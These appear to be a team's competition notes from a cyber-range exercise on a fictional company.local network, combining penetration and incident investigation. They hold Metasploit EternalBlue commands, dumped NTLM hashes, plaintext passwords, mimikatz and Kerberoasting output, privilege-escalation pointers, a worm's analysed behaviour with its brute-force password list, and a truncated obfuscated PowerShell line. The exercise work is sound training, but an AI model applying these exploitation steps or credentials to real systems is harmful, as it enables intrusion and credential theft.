НТО - HackMD

# НТО https://github.com/ArturLukianov/nto [TOC] --- ## Today Today we found traf.pcap on 10.7.1.254:home/user. We downloaded this file and detect encryptor code there. ![](https://media.discordapp.net/attachments/949564455807774735/952084681396989982/unknown.png) But we couldn't decrypt this flag. ![](https://media.discordapp.net/attachments/949564455807774735/952104437508350003/unknown.png) We decrypted a flag: Ex minimis seminibus nascuntur ingentia. Encrypted file was on a machine with ip 10.7.239.6. It has been encrypted using AES-256 with CBC mode. In the HTTP traffic we could find a key and IV. The key that was used: ```SSxL4Qg//ErUxRqy25q4h4QVKWl8x5DxjvSVl+1fEsQ``` We found out that the attacker used the Zerologon exploit. We can state this as it was 4742 event in log file. Also we found 7 stages that an attacker has performed to attack computers. We wrote them into a form on the site. We wrote and applied rules to Suricata IDS. The rules can be found in the Cyber Killchain report. P.S. Some files we used can be found on our GitHub: https://github.com/ArturLukianov/nto --- ## Domain info Forst: company.local NS: ns1.company.local, ns2.company.local Hosts vulnerable to eternalblue: 10.7.2.12, 10.7.4.8, 10.7.239.6, 10.7.240.14 We used secretsdump.py from impacket to dump domain credentials: cloudbase-init:59dZMVxSDcGu9eJdPJvN ``` Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3ba953a34bd434c1db714577648922b::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:40c4b70af394c0c8e36448d311162665::: mpuser:1106:aad3b435b51404eeaad3b435b51404ee:c3ba953a34bd434c1db714577648922b::: company.local\cadm:1000:aad3b435b51404eeaad3b435b51404ee:3e3b78359fdb827d5d348b7b923f4e55::: fedorov:1113:aad3b435b51404eeaad3b435b51404ee:80a7af13ca4fac620bb29e97565ba4a1::: cloudbase-init:1001:aad3b435b51404eeaad3b435b51404ee:265ae2723c218a4cfa53ca46527c50e9::: Exch_srv:1107:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49::: ivanov:1108:aad3b435b51404eeaad3b435b51404ee:ae974876d974abd805a989ebead86846::: petrov:1109:aad3b435b51404eeaad3b435b51404ee:c9ab9d08cc7da5a55d8a82d869e01ea8::: sidorov:1110:aad3b435b51404eeaad3b435b51404ee:6be408f1e80386822f4b2052f1f84b4e::: kuzmin:1111:aad3b435b51404eeaad3b435b51404ee:766b62d3db023f90443469d86393ca66::: markov:1112:aad3b435b51404eeaad3b435b51404ee:5e5c04a4181fcffa0bf8c1034c5e30a6::: frolov:1114:aad3b435b51404eeaad3b435b51404ee:61577195ec3fe96ca0ee84a1e32bb539::: morozov:1115:aad3b435b51404eeaad3b435b51404ee:4c67802c279237004ec84f3f9236ce84::: borisov:1116:aad3b435b51404eeaad3b435b51404ee:e5794f6069f716e229fb5795bfd164d9::: ``` ## Loot Creds from etc/shadow: From|Login|Password -|-|- ALL|cadm|pathGlobA11 10.7.2.10, 10.7.2.11|admin|Ronaldo7 10.7.2.10|debian|honey06 10.7.2.11|debian|-- 10.7.2.53|admin|-- Creds from domain controller: From|Login|Password -|-|- domain|ivanov|P@ssw0rd1 domain|Administrator|Server1 domain|Exch_srv|Passw0rd123 domain|petrov|P@ssw0rd2 domain|cadm|pathGlobA11 ## DMZ (10.7.2.0/24) ### 10.7.2.10 PORT|SERVICE|VERSION -|-|- 22/tcp|ssh|OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp|http|nginx 1.14.2 Wordpress 3306/tcp|mysql|PostgreSQL (unauthorized) 8080/tcp|http|nginx 1.14.2 Flask 33060|mysql|MySQL Application on 8080 has filter for sql injections, but it is weak and can be bypassed. Wordpress Weak credentials: admin:admin Wordpress access log is on `/var/log/nginx/wordpress_access.log` There is only two IPs who accessed the server: 192.168.122.1 - Admin's IP (installed the wordpress initially) 192.168.224.254 - from this IP we can see file upload to the WPFM, we can assume this is attacker 192.168.224.254 logged in and uploaded files to wordpress file manager. But there is no requests to x.php or test1.php from this IP. Database credentials: wpuser:mypassword ![](https://i.imgur.com/o6X6mtZ.png) Some suspicious files in /wp-content/plugins/wp-file-manager/lib/files : ![](https://i.imgur.com/P17JDbm.png) test1.php is a web shell: ![](https://i.imgur.com/7e9iD4G.png) and x.php is a PNG with embedded php shell: ![](https://i.imgur.com/QcgAKsf.png) ![](https://i.imgur.com/GSZrJnC.png) After getting inside we can find that sudo python is allowed to www-data: ![](https://i.imgur.com/iFxDXxp.png) Reference: https://gtfobins.github.io/gtfobins/python/#sudo ![](https://i.imgur.com/cIGY7X1.png) admin installed policykit: ![](https://i.imgur.com/QqcgxrQ.png) This version is vulnerable to exploit: https://www.exploit-db.com/exploits/50689 Passwords for admin and debian are weak and can be found in rockyou.txt ![](https://i.imgur.com/N63Lu5L.png) ### 10.7.2.11 PORT|SERVICE|VERSION -|-|- 22/tcp|ssh|OpenSSH 6.7p1 Debian 5 (protocol 2.0) 80/tcp|http|Apache httpd 2.4.10 ((Debian)) Drupal (CyberPolygon) 139/tcp|netbios-ssn|Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp|netbios-ssn|Samba smbd 4.2.14-Debian (workgroup: WORKGROUP) Hostname: CLEAN-DRUPAL Debian Samba: ``` Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers IPC$ IPC IPC Service (Samba 4.2.14-Debian) ``` After login with cadm:pathToGlobA11 we see this message: > Oh! Hello there! You've been infected by GachiRansom, send 300$ to paypal:b.harrington@gmail.com to get your unecnryption key. ![](https://i.imgur.com/m5nP7uC.png) There are some encrypted files (.encr), sploit (exploit?) and chisel(tcp/udp tunnel) VirusTotal identifies sploit as exploit to cve-2016-5195 (dirtycow) ![](https://i.imgur.com/gnGhJvi.png) We found working tunnel and reveal IP address of attacker 10.7.200.50 Database password: drupaluser:DruP@ss531 Where are two users: login|hash|email -|-|- admin | $S$DrjhY9H/SDz7/hZ4sJp2KiQWx3/ldBEFaCJQK0DUyRRyeHR6W3zw | svc-cyber-mail@rt-solar.ru user1 | $S$DCWEfhlKrg8bKCI9TJSn7hVyjp05ktwnM6KlHC4wRE0scj1CBbaN | user1@server.example ### 10.7.2.12 PORT|SERVICE|VERSION --|--|-- 22|ssh|OpenSSH for_Windows_8.6 (protocol 2.0) 25|smtp|SLmail smtpd 5.5.0.4433 79|finger|SLMail fingerd 106|pop3pw|SLMail pop3pw 110|pop3|BVRP Software SLMAIL pop3d 135|msrpc|Microsoft Windows RPC 139|netbios-ssn|Microsoft Windows netbios-ssn 445|microsoft-ds|Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 3389|tcpwrapped| 49152|msrpc|Microsoft Windows RPC 49153|msrpc|Microsoft Windows RPC 49154|msrpc|Microsoft Windows RPC 49155|msrpc|Microsoft Windows RPC 49156|msrpc|Microsoft Windows RPC 49159|msrpc|Microsoft Windows RPC Hostname: ARAM-SLMAIL (openstacklocal) Vulnerable to EternalBlue ``` msfconsole > search eternal > use 0 > set rhosts 10.7.2.12 > run ``` ![](https://i.imgur.com/s4fmFSR.png) ### 10.7.2.53 PORT|SERVICE|VERSION --|--|-- 22|ssh|OpenSSH 8.4p1 Debian 5 (protocol 2.0) 80|http|nginx 1.18.0 8080|http|nginx 1.18.0 Contains critical information in db: ![](https://i.imgur.com/TpnvGYG.png) ![](https://i.imgur.com/M28zw40.png) Passwords: ``` +--------------+----------------+ | privateLogin | password | +--------------+----------------+ | m.astahov | Gdtfh677fhm | | d.secunova | 44445qwerty | | i.shpagin | 4815162342 | | g.sergeeva | qwertyuiop[] | | a.yandutova | zxcvbnmqazwsx | | m.tsarev | passWWord | | m.zodorina | qazwsxedcrfv | | k.pchelkin | VyregNN@#gdh.! | | l.izofatova | yhUJbbndt^%4sh | | a.golubev | 67Tgb89UJm | +--------------+----------------+ ``` ## SERVERS (10.7.3.0/24) ### 10.7.3.10 PORT|SERVICE|VERSION --|--|-- 53|domain|Simple DNS Plus 88|kerberos-sec|Microsoft Windows Kerberos (server time: 2022-03-10 10:11:26Z) 135|msrpc|Microsoft Windows RPC 139|netbios-ssn|Microsoft Windows netbios-ssn 389|ldap|Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name) 445|microsoft-ds?| 464|kpasswd5?| 593|ncacn_http|Microsoft Windows RPC over HTTP 1.0 636|tcpwrapped| 3268|ldap|Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name) 3269|tcpwrapped| 3389|ms-wbt-server|Microsoft Terminal Services OS: Windows 10 Hostname: ns2.company.local ### 10.7.3.20 PORT|SERVICE|VERSION --|--|-- 25|smtp|Microsoft Exchange smtpd 80|http|Microsoft IIS httpd 10.0 81|http|Microsoft IIS httpd 10.0 110|pop3|Microsoft Exchange 2007-2010 pop3d 135|msrpc|Microsoft Windows RPC 139|netbios-ssn|Microsoft Windows netbios-ssn 143|imap|Microsoft Exchange 2007-2010 imapd 443|ssl/http|Microsoft IIS httpd 10.0 444|ssl/http|Microsoft IIS httpd 10.0 445|microsoft-ds?| 587|smtp|Microsoft Exchange smtpd 593|ncacn_http|Microsoft Windows RPC over HTTP 1.0 808|ccproxy-http?| 993|ssl/imap|Microsoft Exchange 2007-2010 imapd 995|ssl/pop3|Microsoft Exchange 2007-2010 pop3d 1801|msmq?| 2103|msrpc|Microsoft Windows RPC 2105|msrpc|Microsoft Windows RPC 2107|msrpc|Microsoft Windows RPC 3389|ms-wbt-server|Microsoft Terminal Services 3800|http|Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 3801|mc-nmf|.NET Message Framing 3828|mc-nmf|.NET Message Framing 6001|ncacn_http|Microsoft Windows RPC over HTTP 1.0 6502|msrpc|Microsoft Windows RPC OS: Windows 10 Hostname: mx1.company.local ### 10.7.3.50 PORT|SERVICE|VERSION --|--|-- 53|domain|Simple DNS Plus 88|kerberos-sec|Microsoft Windows Kerberos (server time: 2022-03-10 10:33:13Z) 135|msrpc|Microsoft Windows RPC 139|netbios-ssn|Microsoft Windows netbios-ssn 389|ldap|Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name) 445|microsoft-ds?| 464|kpasswd5?| 593|ncacn_http|Microsoft Windows RPC over HTTP 1.0 636|tcpwrapped| 3268|ldap|Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name) 3269|tcpwrapped| 3389|ms-wbt-server|Microsoft Terminal Services OS: Windows 10 Hostname: ns1.company.local ## OFFICE (10.7.4.0/24) Host|IP -|- custarm.company.local|10.7.4.6 BUCHGARM.company.local|10.7.4.8 sysadminarm.company.local|10.7.4.10 enggeneral.company.local|10.7.4.13 ### 10.7.4.6 ``` PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: company | NetBIOS_Domain_Name: company | NetBIOS_Computer_Name: CUSTARM | DNS_Domain_Name: company.local | DNS_Computer_Name: custarm.company.local | DNS_Tree_Name: company.local | Product_Version: 10.0.17763 |_ System_Time: 2022-03-10T05:42:06+00:00 |_ssl-date: 2022-03-10T05:42:14+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=custarm.company.local | Issuer: commonName=custarm.company.local | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2022-02-15T12:20:01 | Not valid after: 2022-08-17T12:20:01 | MD5: 9d6a dc1f f2ce d5f2 23b3 6c23 f7d2 0fd5 |_SHA-1: ab86 e352 5ebf 1a72 132d 1913 d358 6782 4dbd d38f ``` Hostname: custarm.company.local Services: Port|Service -|- 3389|RDP 445|SMB ### 10.7.4.8 ``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0) | ssh-hostkey: | 3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA) | 256 1b:ba:74:cf:1b:cd:36:cf:0c:09:c1:f3:e4:d3:d0:7f (ECDSA) |_ 256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: company) 3389/tcp open tcpwrapped | ssl-cert: Subject: commonName=BUCHGARM.company.local | Issuer: commonName=BUCHGARM.company.local | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2022-02-15T12:20:09 | Not valid after: 2022-08-17T12:20:09 | MD5: a3f1 4a74 ad7b bc1d cd85 12b5 a229 ed8b |_SHA-1: 458f 268e 5e2e 0270 dc52 9d4e 913c 402a 850e 929a | rdp-ntlm-info: | Target_Name: company | NetBIOS_Domain_Name: company | NetBIOS_Computer_Name: BUCHGARM | DNS_Domain_Name: company.local | DNS_Computer_Name: BUCHGARM.company.local | DNS_Tree_Name: company.local | Product_Version: 6.1.7601 |_ System_Time: 2022-03-10T05:43:44+00:00 |_ssl-date: 2022-03-10T05:43:59+00:00; 0s from scanner time. 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49176/tcp open msrpc Microsoft Windows RPC ``` Hostname: BUCHGARM.company.local OS: Windows 7 Professional 7601 Service Pack 1 Services: Port|Service -|- 3389|RDP 445|SMB 22|SSH Vulnerable to EternalBlue: ``` msfconsole > search eternal > use 0 > set rhosts 10.7.4.8 > run ``` ![](https://i.imgur.com/pxc5jEb.png) Dumping creds via mimikatz: ``` > load kiwi > creds_all ... BUCHGARM$ company ,FhxL,6>/_0zE5D`18RNSxi`[/=]bm7;DR:w+8PInFb*#<w(N57^W"`_x\qG$k6#7,BMVeKzV5f!!M[b4+0C5,H`<>Fqg<reOHhUW=/=wB7X%[El[]frMhqu ... ``` ![](https://i.imgur.com/l7hGwy5.png) (It's a computer account) Domain user found: cadm cadm is a domain admin shortest paths: ![](https://i.imgur.com/hq1zXOl.png) Upload PowerView to gather info about domain: ``` > upload /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 > load powershell > powershell_shell Import-Module .\PowerView.ps1 ``` SPNs (kerberostable): ![](https://i.imgur.com/njr2lIF.png) kadmin/changepw ``` $krb5tgs$18$*UNKNOWN$UNKNOWN$kadmin/changepw*$8DEF7993C658C6D52537096778B6A2DC$7290230069EF4F0F2 2D12FB160B64CD9D046AF76E8EB5973EE8CDBA827BAED0F2B6657E4C30382356900207D07878BAD72AFFF434B8FE7CB2 3768890B2E733163B36BC45A89D55CB81A0B5271ABB7611ACF0B6ED503B20B6EBD12D89C7E58D00A1DD75B4C4381B92B 372061A8A83EA1875DD1DDC47937649FD2B1335F711481EF3E4355BAEAD228DFB9CD1D1C005478E8A6F03ABD34A574FB 5B1D56AD2B0641D9B6806BC5125965A997368DCA48C6FDCCF725F8BAA9995197152DEE9A0D9CBDE4F9FE4B8140264387 6723F75F0B0DF0B262761017BA65E315050AC4AE295D3E3BF2CF073FA245C50427D5BB95840372972B4889C84936C3C4 B362DAC65DC096896243ABEE99E28EC7FEE5CB981F6CDEFAA543064E977F20D18F9FD5D76BB99EE681E5009585B3725C 80E93C26CF866B60BB0D291418D7D7AA5C440B4B67E506AB33518573FA10AF905808BD4CA3C1BA68F8CD2844035348E2 4AE930C025D2FFE9405A0BB46E8ED7BE90A38E22CBD8C3A4380F99FAD0B4FB36775BB95DD4557E413B9063878F41E9CA 37D5F1FE0EF059BFA2A5CE2B6F65E4B82E518D89DC066946306D521BEF73835625CAB200F792492806129E56D1EAA497 551CDBDBC465D24DDB6F28597FD5E65C623E2A6DAA0AA550C0B844A742522E87FE19169F02F8A565F20A36A14D49FE03 18428BB7DA659841201DFA7D2E492F79FF772297B2A79C171DDF807C949CDB59C1A9BCF98D128BEA1B51A07DC26C7CD0 950F37C3E24D897FBC239C823778C692E91A685E0C07884346E937F9C7F2D4770BA4C800127E28D3F4EC9C777F1DBB5A B7A5E0CD35B760D8511D76463CE7113FC0EC2E5EEFB521915F67F6C652CD6C8094D4C944C093CB0328BD05C484F651B0 E38E3929ADBE5B6A899430EDEAF1B5127284D93B39170F096F67C5023D8FAD78A1496EEE3383E5794BE4739DD29232C3 15B3AB611E37F32BB9FBE13A36A58623830383DC3C6EFD06E4DCF538B0B0446ED7EDC5134163A64F01757BE9E6786511 D6E8021F89C460B68D0349F7538235C785DEE9923042D13F7F9D7E9FD90C6A6949F594F5CFE3CE2BD518E83D29FCEDB4 A2D782B84F4563863E6AC57060946AE3D359DED8C2CBDDE59090EFFC27AF51570C675C2A5CA9347151509C20FFC79495 BDA29E8AB998C7504853998EB479721454818F120CD589F563D78827A3D31CEFDCCB9F7F6FA24DD8CAEC447E627F2F46 BBA26E56EF7E5C6912FC971D8156746B42587AFBCCE8E6CA4D35551B186FFCAAEA906DE2148A944C2395E99D2844FC5D 9222D9FBA358C37A09FF2B6F8B94D20B18AF53E6C46F430C39051EE9E3C761A5FBD86D796A60C85701BD96E26C276159 96A4C1BCC298ACAC8DC5C1BC8B286B4E7A9A5B4D6C16AABFBDFA363588E822FD94827A3B98833AE1DBFE49215F500B50 3453821EB14F05A0EDB48047418DAB9CA1DC465416D1DBBAD747F0A9C54B26CF65B6014C4D85A56639F57A998 ``` ### 10.7.4.10 ``` PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: company | NetBIOS_Domain_Name: company | NetBIOS_Computer_Name: SYSADMINARM | DNS_Domain_Name: company.local | DNS_Computer_Name: sysadminarm.company.local | DNS_Tree_Name: company.local | Product_Version: 10.0.17763 |_ System_Time: 2022-03-10T05:55:18+00:00 | ssl-cert: Subject: commonName=sysadminarm.company.local | Issuer: commonName=sysadminarm.company.local | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2022-02-15T12:20:01 | Not valid after: 2022-08-17T12:20:01 | MD5: ff95 b689 f1fc 6daf dcd6 5a3c 788e f750 |_SHA-1: 79f5 01e4 cb05 5c11 7eb6 761a 9392 dddf deb5 e9a0 |_ssl-date: 2022-03-10T05:55:26+00:00; 0s from scanner time. ``` Hostname: sysadminarm.company.local Services: Port|Service -|- 3389|RDP 445|SMB ### 10.7.4.13 Hostname: enggeneral.company.local Services: Port|Service -|- 3389|RDP 445|SMB ## АСУ ТП (10.7.239.0/24, 10.7.240.0/24) ### 10.7.239.0/24 #### 10.7.239.12 ``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0) | ssh-hostkey: | 3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA) | 256 1b:ba:74:cf:1b:cd:36:cf:0c:09:c1:f3:e4:d3:d0:7f (ECDSA) |_ 256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519) 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: company) 1433/tcp open ms-sql-s Microsoft SQL Server 2012 11.00.7001.00; SP4 | ms-sql-ntlm-info: | Target_Name: company | NetBIOS_Domain_Name: company | NetBIOS_Computer_Name: OIK-SERVER | DNS_Domain_Name: company.local | DNS_Computer_Name: OIK-SERVER.company.local | DNS_Tree_Name: company.local |_ Product_Version: 6.1.7601 |_ssl-date: 2022-03-10T10:12:24+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2022-02-18T08:49:21 |_Not valid after: 2052-02-18T08:49:21 3389/tcp open ssl/ms-wbt-server? | rdp-ntlm-info: | Target_Name: company | NetBIOS_Domain_Name: company | NetBIOS_Computer_Name: OIK-SERVER | DNS_Domain_Name: company.local | DNS_Computer_Name: OIK-SERVER.company.local | DNS_Tree_Name: company.local | Product_Version: 6.1.7601 |_ System_Time: 2022-03-10T10:12:17+00:00 |_ssl-date: 2022-03-10T10:12:24+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=OIK-SERVER.company.local | Not valid before: 2022-02-15T12:20:47 |_Not valid after: 2022-08-17T12:20:47 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC Service Info: Host: OIK-SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2022-03-10T10:12:16 |_ start_date: 2022-02-18T08:49:22 | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: OIK-SERVER | NetBIOS computer name: OIK-SERVER\x00 | Domain name: company.local | Forest name: company.local | FQDN: OIK-SERVER.company.local |_ System time: 2022-03-10T13:12:16+03:00 | ms-sql-info: | 10.7.239.5:1433: | Version: | name: Microsoft SQL Server 2012 SP4 | number: 11.00.7001.00 | Product: Microsoft SQL Server 2012 | Service pack level: SP4 | Post-SP patches applied: false |_ TCP port: 1433 |_clock-skew: mean: -25m42s, deviation: 1h08m01s, median: 0s |_nbstat: NetBIOS name: OIK-SERVER, NetBIOS user: <unknown>, NetBIOS MAC: fa:16:3e:82:0e:3f (unknown) | smb2-security-mode: | 2.1: |_ Message signing enabled but not required | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) ``` #### 10.7.239.6 ``` Host script results: | smb2-security-mode: | 2.1: |_ Message signing enabled but not required | smb-os-discovery: ``` PORT|SERVICE|VERSION --|--|-- 22|ssh|OpenSSH for_Windows_8.6 (protocol 2.0) 135|msrpc|Microsoft Windows RPC 139|netbios-ssn|Microsoft Windows netbios-ssn 445|microsoft-ds|Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: company) 3389|ssl/ms-wbt-server?| 49152|msrpc|Microsoft Windows RPC 49153|msrpc|Microsoft Windows RPC 49154|msrpc|Microsoft Windows RPC 49175|msrpc|Microsoft Windows RPC OS: Windows 7 Hostname: OIK-CLIENT.company.local Vulnerable to EternalBlue: Dumping creds: ![](https://i.imgur.com/KhBqDPc.png) Administrator:Server1 But this creds are not valid ### 10.7.240.0/24 #### 10.7.240.5 ``` Host is up (0.0073s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 06:da:27:f3:fa:ba:ad:7b:a4:88:2c:94:ae:e6:1d:54 (RSA) | 256 79:83:2d:02:3f:b0:30:e2:54:51:1d:34:b3:2a:c6:a5 (ECDSA) |_ 256 a1:34:1b:fb:fd:f7:ff:33:46:b8:be:70:b8:a3:d0:7d (ED25519) 80/tcp open http JBoss Enterprise Application Platform |_http-title: SIEDWEB Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` #### 10.7.240.6 ``` Host is up (0.0077s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 2a:5b:b2:e1:52:b4:e9:cc:f7:69:5a:d6:75:ca:74:e1 (RSA) | 256 f9:dd:de:ed:2f:98:3e:a0:60:6d:2f:4d:bf:fa:40:35 (ECDSA) |_ 256 82:82:3d:74:1b:f1:9f:76:b5:38:64:42:c0:91:37:49 (ED25519) 80/tcp open http JBoss Enterprise Application Platform |_http-title: SIEDWEB Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` #### 10.7.240.9 ``` Host is up (0.0080s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 0e:95:fa:3e:46:58:a8:2e:62:7d:7b:50:fe:9e:40:eb (RSA) | 256 3a:23:e6:f4:fe:db:59:f1:eb:4d:2a:15:a0:24:8b:a6 (ECDSA) |_ 256 5d:19:78:f8:84:76:96:e3:a1:2c:fb:5f:2c:78:0b:51 (ED25519) 80/tcp open http JBoss Enterprise Application Platform |_http-title: SIEDWEB Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` #### 10.7.240.10 ``` Host is up (0.0060s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 03:16:1f:5e:73:5b:71:6e:c6:66:13:0c:c3:85:9e:16 (RSA) | 256 5f:88:7a:ab:c9:f4:91:02:1d:56:e1:d1:59:19:30:30 (ECDSA) |_ 256 4c:c3:86:76:6e:67:74:be:dc:42:9d:49:e9:38:f7:a1 (ED25519) 80/tcp open http JBoss Enterprise Application Platform |_http-title: SIEDWEB Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` #### 10.7.240.14 ``` Host is up (0.0068s latency). Not shown: 989 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0) | ssh-hostkey: | 3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA) | 256 1b:ba:74:cf:1b:cd:36:cf:0c:09:c1:f3:e4:d3:d0:7f (ECDSA) |_ 256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 3389/tcp open ssl/ms-wbt-server? | ssl-cert: Subject: commonName=aram-entek | Not valid before: 2022-02-14T16:18:27 |_Not valid after: 2022-08-16T16:18:27 |_ssl-date: 2022-03-10T10:40:50+00:00; 0s from scanner time. | rdp-ntlm-info: | Target_Name: ARAM-ENTEK | NetBIOS_Domain_Name: ARAM-ENTEK | NetBIOS_Computer_Name: ARAM-ENTEK | DNS_Domain_Name: aram-entek | DNS_Computer_Name: aram-entek | Product_Version: 6.1.7601 |_ System_Time: 2022-03-10T10:40:41+00:00 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC Service Info: Host: ARAM-ENTEK; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: aram-entek | NetBIOS computer name: ARAM-ENTEK\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2022-03-10T13:40:41+03:00 |_nbstat: NetBIOS name: ARAM-ENTEK, NetBIOS user: <unknown>, NetBIOS MAC: fa:16:3e:96:72:de (unknown) | smb2-time: | date: 2022-03-10T10:40:42 |_ start_date: 2022-02-15T16:19:24 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_clock-skew: mean: -35m59s, deviation: 1h20m29s, median: 0s | smb2-security-mode: | 2.1: |_ Message signing enabled but not required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 256 IP addresses (9 hosts up) scanned in 84.26 seconds ``` Vulnerable to EternalBlue ![](https://i.imgur.com/D1XDeFf.png) Dumping creds: ![](https://i.imgur.com/0LZAUJ9.png) cadm:pathGlobA11 This credentials allow us to login to DC and have Domain Admins privs. ## Malware analysis ### WinServ.exe ![](https://i.imgur.com/AwclJaM.png) Suspicious file (possibly compiled python) on 10.7.3.10 Executable was unpacked using pyinstxtractor, than compiled python was decompiled using pycdc. Python compiled malware. Actions: 1. Search for uninfected hosts in hosts list by checking if port 3389 is open 2. Bruteforcing password to Administrator from list of passwords on ntlm 3. Starts http server on already infected machine 4. Executes powershell script, that downloads WinServ.exe from infected machine on victim machine 5. Executes second powershell script, that starts downloaded WinServ.exe List of passwords: ``` Florida1 #1monkey Blondie1 Brandy1 Charles1 Cowboys1 Eminem1 Justice1 Password12 Pepper1 Pr1ncess Sophie1 Special1 Thumper1 Thunder1 Tristan1 Houston1 Jeffrey1 Johnny1 Savannah1 Spencer1 Sweet16 football#1 lucky#13 monkey#1 po#34tato zaq1!QAZ 100%cool Barbie1 ``` ![](https://i.imgur.com/lw899d3.png) --- ```powershell ( ([stRiNg]$VErbOSePREFereNCe)[1,3]+'x'-JOin'')( -jOiN ( 